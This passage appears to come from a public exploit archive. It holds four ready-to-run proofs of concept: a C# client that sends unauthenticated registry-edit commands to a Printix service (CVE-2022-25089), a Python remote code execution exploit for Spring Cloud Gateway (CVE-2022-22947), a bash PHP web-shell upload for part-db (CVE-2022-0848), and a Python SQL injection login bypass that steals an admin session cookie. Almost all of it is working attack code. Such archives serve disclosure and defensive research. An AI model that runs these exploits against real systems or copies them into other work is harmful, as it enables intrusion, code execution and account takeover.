                //Custom cases, such as custom JSON Inputs and more.
                case (100):
                    Console.WriteLine("\n What Host Address? (DNS Names Or IP)\n");
                    Console.Write("IP: ");
                    host = Console.ReadLine();
                    Console.WriteLine("Host address set to: " + host);

                    Console.WriteLine("\n What Data Should Be Sent?\n");
                    Console.Write("Data: ");
                    data = Console.ReadLine();
                    Console.WriteLine("Data set to: " + data);

                    Console.WriteLine("\n What Session Name Should Be Used? \n");
                    Console.Write("Session Name: ");
                    sessionName = Console.ReadLine();
                    Console.WriteLine("Session name set to: " + sessionName);
                    break;
            }
        }

        public static byte[] selectDataType(object value, RegistryValueKind format)
        {
            byte[] array = new byte[50];
            switch (format)
            {
                case RegistryValueKind.String: //1
                    array = Encoding.UTF8.GetBytes((string)value);
                    break;
                case RegistryValueKind.DWord: //4
                    array = ((!(value.GetType() == typeof(int))) ? BitConverter.GetBytes((long)value) : BitConverter.GetBytes((int)value));
                    break;
                case RegistryValueKind.QWord: //11
                    if (value == null)
                    {
                        value = 0L;
                    }
                    array = BitConverter.GetBytes((long)value);
                    break;
                case RegistryValueKind.MultiString: //7
                    {
                        if (value == null)
                        {
                            value = new string[1] { string.Empty };
                        }
                        string[] array2 = (string[])value;
                        foreach (string s in array2)
                        {
                            byte[] bytes = Encoding.UTF8.GetBytes(s);
                            byte[] second = new byte[1] { (byte)bytes.Length };
                            array = array.Concat(second).Concat(bytes).ToArray();
                        }
                        break;
                    }
            }
            return array;
        }
    }

    class CVESUBMISSION
    {
        static void Main(string[] args)
        {
        FORCERESTART:
            try
            {
                //Edit any registry without auth:
                //Use command 49, use the code provided on the desktop...
                //This modifies it directly, so no specific username is needed. :D

                //The command parameter, a list of commands is below.
                int command = 43;
                //To force the user to input variables or not.
                bool forceCustomInput = false;
                //The data to send, this isn't flexible and should be used only for specific examples.
                //Try to keep above 4 characters if you're just shoving things into the command.
                string data = "{\"profileID\":1,\"result\":true}";
                //The username to use.
                //This is to fulfill the requriements whilst in development mode.
                DefaultValues.CurrentSessName = "printixMDNs7914";
                //The host to connect to. DEFAULT= "localhost"
                string host = "192.168.1.29";
                // Configuration Above

            InvalidInputLabel:
                Console.Clear();
                Console.WriteLine("Please select the certificate you want to use with port 21338.");
                //Deprecated, certificates are no longer needed to verify, as clientside only uses the self-signed certificates now.
                Console.WriteLine("Already selected, client authentication isn't needed.");
                Console.WriteLine(" /───────────────────────────\\ ");
                Console.WriteLine("\nWhat would you like to do?");
                Console.WriteLine("\n 1. Send Ping Request");
                Console.WriteLine(" 2. Send Registry Edit Request");
                Console.WriteLine(" 3. Send Custom Request");
                Console.WriteLine(" 4. Experimental Mode (Beta)\n");
                Console.Write("I choose option # ");

                try
                {
                    switch (int.Parse(Console.ReadLine().ToLower()))
                    {
                        case (1):
                            Session session = new Session(2);
                            command = session.commandNumber;
                            host = session.host;
                            data = session.data;
                            DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200);
                            break;
                        case (2):
                            Session sessionTwo = new Session(49);
                            command = sessionTwo.commandNumber;
                            host = sessionTwo.host;
                            data = sessionTwo.data;
                            DefaultValues.CurrentSessName = "printixReflectorPackage_" + new Random().Next(1, 200);
                            break;
                        case (3):
                            Console.WriteLine("What command number do you want to input?");
                            command = int.Parse(Console.ReadLine().ToString());
                            Console.WriteLine("What IP would you like to use? (Default = localhost)");
                            host = Console.ReadLine();
                            Console.WriteLine("What data do you want to send? (Keep over 4 chars if you are not sure!)");
                            data = Console.ReadLine();
                            Console.WriteLine("What session name do you want to use? ");
                            DefaultValues.CurrentSessName = Console.ReadLine();
                            break;
                        case (4):
                            Console.WriteLine("Not yet implemented.");
                            break;
                    }
                }
                catch (Exception e)
                {
                    Console.WriteLine("Invalid Input!");
                    goto InvalidInputLabel;
                }

                Console.WriteLine("Proof Of Concept For CVE-2022-25089 | Version: 1.3.24 | Created by Logan Latvala");
                Console.WriteLine("This is a RAW API, in which you may get unintended results from usage.\n");

                CompCommClient client = new CompCommClient();
                byte[] responseStorage = new byte[25555];
                int responseCMD = 0;

                client.Connect(host, 21338, 3, 10000);
                client.SendMessage(command, Encoding.UTF8.GetBytes(data));

                // Theory: There is always a message being sent, yet it doesn't read it, or can't intercept it.
                // Check for output multiple times, and see if this is conclusive.
                //client.SendMessage(51, Encoding.ASCII.GetBytes(data));

                new Thread(() =>
                {
                    //Thread.Sleep(4000);
                    if (client.Connected())
                    {
                        int cam = 0;
                        // 4 itterations of loops, may be lifted in the future.
                        while (cam < 5)
                        {
                            //Reads the datastream and keeps returning results.
                            //Thread.Sleep(100);
                            try
                            {
                                try
                                {
                                    if (responseStorage?.Any() == true)
                                    {
                                        //List<byte> byo1 = responseStorage.ToList();
                                        if (!Encoding.UTF8.GetString(responseStorage).Contains("Caption"))
                                        {
                                            foreach (char cam2 in Encoding.UTF8.GetString(responseStorage))
                                            {
                                                if (!char.IsWhiteSpace(cam2) && char.IsLetterOrDigit(cam2) || char.IsPunctuation(cam2))
                                                {
                                                    Console.Write(cam2);
                                                }
                                            }
                                        }
                                        else
                                        {
                                        }
                                    }
                                }
                                catch (Exception e)
                                {
                                    Debug.WriteLine(e);
                                }
                                client.Read(out responseCMD, out responseStorage);
                            }
                            catch (Exception e)
                            {
                                goto ReadException;
                            }
                            Thread.Sleep(100);
                            cam++;
                            //Console.WriteLine(cam);
                        }
                    }
                    else
                    {
                        Console.WriteLine("[WARNING]: Client is Disconnected!");
                    }

                ReadException:
                    try
                    {
                        Console.WriteLine("Command Variable Response: " + responseCMD);
                        Console.WriteLine(Encoding.UTF8.GetString(responseStorage) + " || " + responseCMD);
                        client.disConnect();
                    }
                    catch (Exception e)
                    {
                        Console.WriteLine("After 4.2 Seconds, there has been no response!");
                        client.disConnect();
                    }
                }).Start();

                Console.WriteLine(responseCMD);
                Console.ReadLine();
            }
            catch (Exception e)
            {
                Console.WriteLine(e);
                Console.ReadLine();
                //Environment.Exit(e.HResult);
            }
            goto FORCERESTART;
        }
    }
}
  23. # Exploit Title: Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)
# Google Dork: N/A
# Date: 03/03/2022
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://spring.io/
# Software Link: https://spring.io/projects/spring-cloud-gateway
# Version: This vulnerability affect Spring Cloud Gateway < 3.0.7 & < 3.1.1
# Tested on: 3.1.0
# CVE : CVE-2022-22947

import random
import string
import requests
import json
import sys
import urllib.parse
import base64

headers = {
    "Content-Type": "application/json",
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',
    'Accept': '*/*'
}
proxies = {
    'http': 'http://172.29.32.1:8081',
    'https': 'http://172.29.32.1:8081',
}

id = ''.join(random.choice(string.ascii_lowercase) for i in range(8))


def exploit(url, command):
    payload = {
        "id": id,
        "filters": [{
            "name": "AddResponseHeader",
            "args": {
                "name": "Result",
                "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\u0022" + command + "\u0022).getInputStream()))}"
            }
        }],
        "uri": "http://example.com"
    }
    commandb64 = base64.b64encode(command.encode('utf-8')).decode('utf-8')
    rbase = requests.post(url + '/actuator/gateway/routes/' + id, headers=headers, data=json.dumps(payload), proxies=proxies, verify=False)
    if(rbase.status_code == 201):
        print("[+] Stage deployed to /actuator/gateway/routes/" + id)
        print("[+] Executing command...")
        r = requests.post(url + '/actuator/gateway/refresh', headers=headers, proxies=proxies, verify=False)
        if(r.status_code == 200):
            print("[+] getting result...")
            r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False)
            if(r.status_code == 200):
                get_response = r.json()
                clean(url, id)
                return get_response['filters'][0].split("'")[1]
            else:
                print("[-] Error: Invalid response")
                clean(url, id)
                exit(1)
        else:
            clean(url, id)
            print("[-] Error executing command")


def clean(url, id):
    remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, proxies=proxies, verify=False)
    if(remove.status_code == 200):
        print("[+] Stage removed!")
    else:
        print("[-] Error: Fail to remove stage")


def banner():
    print("""
###################################################
#                                                 #
#        Exploit for CVE-2022-22947               #
#        - Carlos Vieira (Crowsec)                #
#                                                 #
#   Usage:                                        #
#   python3 exploit.py <url> <command>            #
#                                                 #
#   Example:                                      #
#   python3 exploit.py http://localhost:8080 'id' #
#                                                 #
###################################################
""")


def main():
    banner()
    if len(sys.argv) != 3:
        print("[-] Error: Invalid arguments")
        print("[-] Usage: python3 exploit.py <url> <command>")
        exit(1)
    else:
        url = sys.argv[1]
        command = sys.argv[2]
        print(exploit(url, command))


if __name__ == '__main__':
    main()
  24. # Exploit Title: part-db 0.5.11 - Remote Code Execution (RCE)
# Google Dork: NA
# Date: 03/04/2022
# Exploit Author: Sunny Mehra @DSKMehra
# Vendor Homepage: https://github.com/part-db/part-db
# Software Link: https://github.com/part-db/part-db
# Version: [ 0.5.11.]
# Tested on: [KALI OS]
# CVE : CVE-2022-0848
# ---------------

#!/bin/bash
host=127.0.0.1/Part-DB-0.5.10 #WEBHOST
#Usage: Change host
#Command: bash exploit.sh
#EXPLOIT BY @DSKMehra

echo "<?php system(id); ?>">POC.phtml #PHP Shell Code
result=`curl -i -s -X POST -F "logo_file=@POC.phtml" "http://$host/show_part_label.php" | grep -o -P '(?<=value="data/media/labels/).*(?=" > <p)'`
rm POC.phtml
echo Shell Location : "$host/data/media/labels/$result"
  25. # Exploit Title: Attendance and Payroll System v1.0 - SQLi Authentication Bypass
# Date: 04/03/2022
# Exploit Author: pr0z
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/apsystem.zip
# Version: v1.0
# Tested on: Linux, MySQL, Apache

import requests
import sys
from requests.exceptions import ConnectionError

print('\n >> Attendance and Payroll System v1.0')
print(' >> Authentication Bypass through SQL injection')
print(' >> By pr0z\n')

login_path = '/apsystem/admin/login.php'
index_path = '/apsystem/admin/index.php'
payload = "username=nobodyhavethisusername' UNION SELECT 1 as id, 'myuser' as username, '$2y$10$UNm8zqwv6d07rp3zr6iGD.GXNqo/P4qB7fUZB79M3vmpQ6SidGi.G' as password ,'zzz' as firstname,'zzz' as lastname,'zzz.php' as photo, '2018-04-30' as created_on -- &password=test&login="
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}

# Check for arguments
if len(sys.argv) < 2 or '-h' in sys.argv:
    print("[!] Usage: python3 apsystem_sqli.py http://127.0.0.1")
    sys.exit()

# Bypass Authentication
target = sys.argv[1]
print("[+] Extracting Administrator cookie using SQLi ...")
sess = requests.Session()
try:
    sess.get(target + index_path, headers=headers, verify=False)
    sess.post(target + login_path, data=payload, headers=headers, verify=False)
except ConnectionError:
    print('[-] We were unable to establish a connection')
    sys.exit()

cookie_val = sess.cookies.get_dict().get("PHPSESSID")
print("[+] Use the following cookie:\n")
print(f"PHPSESSID: {cookie_val}")